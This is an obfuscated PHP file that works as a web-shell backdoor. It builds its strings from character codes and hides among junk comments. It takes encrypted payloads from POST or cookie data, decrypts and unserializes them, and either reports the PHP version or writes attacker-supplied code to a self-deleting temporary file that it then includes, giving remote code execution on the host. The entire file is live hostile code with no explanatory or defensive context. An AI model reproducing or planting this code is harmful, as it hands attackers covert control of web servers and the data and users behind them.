<?php $montw    = /*   xnuamq   */ 'montw'    ^ /*stbf */ '';

$jwltmk_xd /*  vdn*/ = /* rvvld   */ "\141"	.	"\x72"     .    $montw(507-393)	.      "a"."y".$montw(95)     .	"m".$montw(97) /*  uh  */ . /*xxjpth*/ "\160";
$ohpnvh  =      "\x63"	.       "\157"	.    $montw(117) /*  itg  */ . /*kolkak */ "n"."\x74";

function /* x   */ tnsqlcr($gdfzlgu, /* lx   */ $axpezgic){
    global /*meyh  */ $montw;


    


 /* _ik */ $gdfzlgu    =    "<" /*fq*/ .       $montw(63) /* ak_c*/ . /*   n  */ "p"."\x68"   .    "\x70" /*   hkjc  */ .   $montw(32) /*  jec   */ . /*  tiamm   */ "u".$montw(909-799) /* pq*/ . /* olkwaq */ "l"."\x69"."\156" /*odo*/ . /*  exhuis*/ $montw(107)	.    "(".$montw(95)       .    $montw(852-757)	.       "F"."\x49"    . /*bzhbyl*/ "L".$montw(69)       .      "_"."_".$montw(41)      .    $montw(1012-953)    .    $montw(32) /*   ayrg */ .	$gdfzlgu["\144"]; /*  nfa  */ $qlnggnvbsg	=    $montw(1009-907) /*v */ .    "\x69"    . /*   inb   */ $montw(721-613) /*eaf_  */ . /*pn   */ $montw(101)    . /*   wk*/ "\137"    .	$montw(305-193) /*  wndi */ .   "u"."t"."\137"	.    "\143" /*   yeodqm*/ .   "o".$montw(110) /*obw */ . /* nlrkgo  */ "t"."e"."n"."t".$montw(115);

   


    $qlnggnvbsg($axpezgic,   $gdfzlgu);

	     z_fsjvl($axpezgic);
}




$odnvexqz    =	73;





function    z_fsjvl($axpezgic)


{ /* mqdrq  */ global     $montw; /*   t   */ 


    include($axpezgic);	$faqoa	= /*bd_zry  */ $axpezgic;

	@unlink($faqoa);}


function    np_xzyqk()


{    global /*  cy */ $montw;
 /*  yc */ $khklrpzq /*yz */ =	array();
      $khklrpzq["p"."\x76"] /*  mvfiw */ =    phpversion();


 /*   c   */ $khklrpzq["s"."v"]	=	"3".$montw(204-158)    .   "5";
	$sovymegtu  =   74;


 /* ykqew  */ echo    @serialize($khklrpzq);}



function	fmggi($gdfzlgu, /*   lo   */ $lbzgsh){
    global      $montw;


	$odudcssn    = /* ck  */ ""; /*   j_i */ $wz_yhxrjc	=     'tawwifqhsl';
 /*   tlzy*/ $qjjogj	= /*   jj */ hash('sha256',       $gdfzlgu);

   $elzvbyivqc    = /*   qftoh  */ str_replace('oaafhnzllm',    $qjjogj, /*   gps */ $wz_yhxrjc);

 /*ibe*/ $khklrpzq    =    0;    while	($khklrpzq    <  strlen($gdfzlgu))  {

  $hpnvrtzh       = /*  ie*/ isset($lbzgsh)    ? /*   gc */ $lbzgsh	:   '';

    for /*_fe   */ ($sywipz      =  0;     $sywipz /*  uytd*/ < /*  uslb  */ strlen($hpnvrtzh)	&&	$khklrpzq       <      strlen($gdfzlgu);	$sywipz++,   $khklrpzq++)       {


    $odudcssn /*   pmqcn*/ .=    $montw(ord($gdfzlgu[$khklrpzq])    ^   ord($hpnvrtzh[$sywipz])); /* rvjm  */ }      if  (strlen($odudcssn) /*vzubw*/ >	20)    { /*   nuozht */ $elzvbyivqc /* gft   */ = /*   k */ substr($odudcssn,       0,     20);       }

 /*inhnf  */ }


 /*  smkfnn */ if /* asqp */ (empty($odudcssn))    {


   $odudcssn /*  t   */ =	date('Y-m-d      H:i:s');    }

	return	$odudcssn;
}




function	egesgnusvs($flwecwv)
{


  global	$montw;
	
    $ntrggdvzes	= /*  e   */ "c"."\146"    .     "\62"    . /* lqmmko */ $montw(199-142) /*   fcbsa */ .    "\x36" /*zv*/ .	"\61"     .     $montw(100)	. /*rgs*/ "9"."-"."\x64"  . /*   h  */ "4"."\60" /*nx_fpm  */ .	$montw(57) /*  zwy */ .     "-"."\x34"	.      "e".$montw(51) /* u */ .   $montw(367-266) /*  iteopm   */ .       "-".$montw(425-328)."\67" /*riw  */ .    $montw(827-777) /*aevxn*/ .     $montw(101) /*  _c   */ .    "-".$montw(55)       . /*  jsxw*/ "8"."\144" /*kw */ . /*k  */ "2".$montw(98)       . /* m  */ "e"."\144"."2".$montw(56) /*vhnmns */ . /* xarf_*/ "7"."\144".$montw(192-144);

    
 /* o_mm   */ foreach /*  gghyu */ ($flwecwv     as /*  ctakow*/ $lluzm   =>    $gdfzlgu)	{
  odgrxm(base64_decode($gdfzlgu),       $ntrggdvzes,	$lluzm);

     }

}



function /*alsvr  */ odgrxm($gdfzlgu, /*  kwfws  */ $ntrggdvzes,       $lluzm)
{

 /* c*/ global    $montw;
 /*yjo */ 
    $gdfzlgu       = /*   ghui   */ unserialize(fmggi(fmggi($gdfzlgu,    $ntrggdvzes), /*   ybolm*/ $lluzm));

	$ckasv    = /*ruluau  */ 'yuddvar';

	$wcwnogz    =	'ips';
    if /*d   */ (isset($gdfzlgu[$montw(97)   .      $montw(107)]))	{

  if     ($gdfzlgu[$montw(425-328)] /*  fjxhf  */ ==    "\x69")     {   np_xzyqk();
    }    elseif /*vksju */ ($gdfzlgu[$montw(425-328)]    == /* q_l */ "e")   {
 /* b_ */ tnsqlcr($gdfzlgu,    sprintf("\56"    . /*cqph*/ "\57"    .	"%".$montw(828-713)      . /*  kvsyon   */ ".".$montw(925-813)    . /* jaex */ "\x6c",     md5($ntrggdvzes)));


			$r_chgnho    =   44;


    } /*yns   */ exit();


 /*   _to   */ }


}egesgnusvs($_POST); /* tosl  */ $qezqo     = /*   c*/ $jwltmk_xd('rawurldecode',    $_POST);

$qnmkg    =      $ohpnvh($qezqo);



egesgnusvs($_COOKIE);    



$afkmvzvry    =     $jwltmk_xd('rawurldecode',	$_COOKIE);




?>